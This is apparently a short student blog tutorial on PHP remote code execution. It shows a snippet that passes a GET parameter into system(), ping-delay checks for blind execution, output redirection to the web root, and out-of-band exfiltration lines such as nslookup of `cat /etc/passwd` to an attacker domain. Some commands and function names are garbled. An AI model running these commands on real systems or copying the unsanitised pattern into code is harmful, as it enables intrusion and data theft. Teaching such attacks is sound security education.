Pwning PHP: Remote Code Execution

Mudhalai Mr
Developer Community SASTRA
2 min readApr 18, 2021

RCE allows an attacker to execute code on a vulnerable machine and the CVSS severity level of RCE is critical (well what more do you need than that?)

Image Credits: Google

Note: Check out this blog for more PHP Pwning and to learn why PHP is targeted.


Similar to the system() function in C, system() in PHP executes all the input as shell commands in the machine. If the user inputs are passed into it, this will lead to Code Execution.

$cmd = $_GET[‘cmd’];
system($cmd); ?>

PHP documentation warns developers not you use it without an input sanitization function.

Other similar code execution functions:

exec(): Execute an external program
pass(): Returns raw output

When the output is not returned it becomes a blind RCE but, how can we verify the bug? We can verify by using time delays,

ping -c 10 delays by 10 secs

ping -c -20 delays by 20 secs

Redirecting Output:

If we have to read the output of the command we can redirect it to a file and expose the file to read it,

uname -i > /var/www/html/info.txt

Similarly, symbols like “&”(for appending commands), “|”(for piping out of one command to another command as input).

Out Of Bound RCE:

We can read the output by returning it through different protocols,

curl`cat flag.txt`

nslookup `cat /etc/passwd`.attacker.domain

RCE has a lot more variants than I covered, try to explore them as they are worth spending time on. For example, there are lots of techniques to bypass Web Application Firewalls and other sanitization programs. And there is a crazy method to cover up RCE inside DNS queries, here are some resources to keep your quest going:

Спасибо :) — Mudhalai Mr DSC SASTRA



Mudhalai Mr
Developer Community SASTRA

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>